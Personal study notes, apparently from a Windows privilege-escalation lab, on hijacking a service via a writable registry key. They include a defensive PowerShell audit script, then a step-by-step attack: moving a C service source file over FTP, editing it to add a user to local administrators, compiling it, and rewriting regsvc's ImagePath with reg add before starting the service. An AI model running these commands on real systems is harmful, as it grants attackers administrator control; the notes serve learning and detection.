Service escalation dealing with the registry
Checking the registry key of a service to see whether we have FullControl over it.
To check (in PowerShell):
Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
The output says FullControl over this key for our user (means we can exploit it).
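Added example, not from these notes or from the lab the notes describe: the Get-Acl check above run as a defender-side audit over every service key instead of one. It flags any Allow ACE that gives a low-privilege principal write-level rights on a service key, and, going one step beyond the check above, any ImagePath that already points outside the usual program directories (the state that the reg add later in these notes leaves behind). The identity list, the trusted-root list and the .exe/.sys heuristic in Get-ImageExecutable are my assumptions; run it from an elevated PowerShell prompt.

```powershell
# Added example (not from the original notes): audit HKLM:\SYSTEM\CurrentControlSet\Services
# for service keys writable by low-privilege principals and for ImagePath values that
# point outside the expected program directories. Run from an elevated prompt.

# Principals that should never hold write rights on a service definition (assumption).
$LowPrivIdentities = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that let a principal change ImagePath or replace the key outright.
# FullControl is a superset of SetValue, so it is caught without being listed; ReadPermissions
# (which read-only ACEs also carry) is deliberately left out to avoid false positives.
$WriteRights = [Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, Delete, ChangePermissions, TakeOwnership'

# Directories a service or driver image is normally expected to live under (assumption).
$TrustedImageRoots = @(
    $env:SystemRoot, '\SystemRoot', "\??\$env:SystemRoot", 'System32',
    $env:ProgramFiles, ${env:ProgramFiles(x86)}
) | Where-Object { $_ }

function Get-ImageExecutable {
    # Reduce an ImagePath value ("C:\x\svc.exe" -arg, %SystemRoot%\...) to the executable path.
    # The unquoted case is a heuristic: stop at the first .exe/.sys token.
    param([string]$ImagePath)
    $expanded = [Environment]::ExpandEnvironmentVariables($ImagePath).Trim()
    if ($expanded.StartsWith('"')) {
        $end = $expanded.IndexOf('"', 1)
        if ($end -gt 1) { return $expanded.Substring(1, $end - 1) }
    }
    $m = [regex]::Match($expanded, '^(.+?\.(exe|sys))(\s|$)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return ($expanded -split '\s+')[0]
}

function Test-ImagePathTrusted {
    param([string]$ImagePath, [string[]]$Roots)
    $exe = Get-ImageExecutable $ImagePath
    foreach ($root in $Roots) {
        if ($exe.StartsWith($root, [StringComparison]::OrdinalIgnoreCase)) { return $true }
    }
    return $false
}

function Find-WeakServiceKeyAcl {
    param(
        [string]$ServicesRoot = 'HKLM:\SYSTEM\CurrentControlSet\Services',
        [string[]]$Identities = $LowPrivIdentities,
        [string[]]$Roots = $TrustedImageRoots
    )
    foreach ($key in Get-ChildItem -Path $ServicesRoot -ErrorAction SilentlyContinue) {
        try { $acl = Get-Acl -Path $key.PSPath -ErrorAction Stop } catch { continue }
        $imagePath = (Get-ItemProperty -Path $key.PSPath -Name ImagePath -ErrorAction SilentlyContinue).ImagePath

        # Finding 1: the ACL itself, i.e. what Get-Acl showed for regsvc, for every service.
        foreach ($rule in $acl.Access) {
            if ($rule.AccessControlType -ne 'Allow') { continue }
            if ($Identities -notcontains $rule.IdentityReference.Value) { continue }
            if (($rule.RegistryRights -band $WriteRights) -eq 0) { continue }
            [pscustomobject]@{
                Service   = $key.PSChildName
                Finding   = 'LowPrivWriteOnServiceKey'
                Principal = $rule.IdentityReference.Value
                Rights    = $rule.RegistryRights
                ImagePath = $imagePath
            }
        }

        # Finding 2: an ImagePath already redirected somewhere unexpected (e.g. C:\Temp).
        if ($imagePath -and -not (Test-ImagePathTrusted $imagePath $Roots)) {
            [pscustomobject]@{
                Service   = $key.PSChildName
                Finding   = 'ImagePathOutsideTrustedRoots'
                Principal = $null
                Rights    = $null
                ImagePath = $imagePath
            }
        }
    }
}

# Usage: list every finding, then spot-check the key from the notes.
Find-WeakServiceKeyAcl | Format-Table -AutoSize
Find-WeakServiceKeyAcl | Where-Object Service -eq 'regsvc'
```

A hit on the first finding is fixed by removing the offending ACE from the service key (Get-Acl, RemoveAccessRule on that rule, then Set-Acl); a hit on the second by resetting ImagePath to the service's real binary. Both the ACE change and the ImagePath rewrite are registry value writes, so registry auditing (Windows Security event 4657, or Sysmon event ID 13 for value sets) on the Services hive catches the reg add step as it happens.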
We can point the service at an executable of our own and start the service; when it runs, it adds a user for us.
Get the file from the Windows machine using FTP:
Kali:
python3 -m pyftpdlib -p 21 --write
# If you need to install it: pip3 install pyftpdlib
In Windows:
Go to the folder that holds the source file, open CMD from that folder (shift + right-click), then:
ftp 10.6.62.12
anonymous
anonymous
put windows_service.c
In Kali:
Stop the FTP server (ctrl+c):
sudo mousepad windows_service.c
Change the whoami command to what you want (here: adding a user to the administrators group):
cmd.exe /k net localgroup administrators user /add
Make an executable:
x86_64-w64-mingw32-gcc windows_service.c -o x.exe
Host a server to move x.exe to the Windows machine into C:\Temp:
Download > Save > Local C > Temp
In Windows:
Add it to regsvc:
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
/v: the value name, i.e. which registry entry under this subkey I want to add or overwrite
ImagePath: the registry value that holds the path to the service's (or driver's) image file
/t: the type
REG_EXPAND_SZ: an expandable string value (environment variables such as %SystemRoot% are expanded)
/d: the data
c:\temp\x.exe: the data itself, the path the service will execute
/f: don't prompt me; I don't want any confirmation when I run this, just overwrite and execute.
Run it / start it:
sc start regsvc
Confirm:
net localgroup administrators

3:30 hours left including notes on 1.5x
I think Linux was 6 hours
Current combined time is about 10:30 hours including notes on 1.5x
2 days, 5:30 each (4/8, 4/9)
4/10 review PEH (maybe web app pentesting?)
